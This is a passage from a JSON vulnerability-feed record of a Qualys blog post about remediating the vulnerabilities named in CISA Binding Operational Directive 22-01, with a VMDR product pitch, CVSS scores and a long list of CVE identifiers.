Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but only partial step in threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", 
"CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}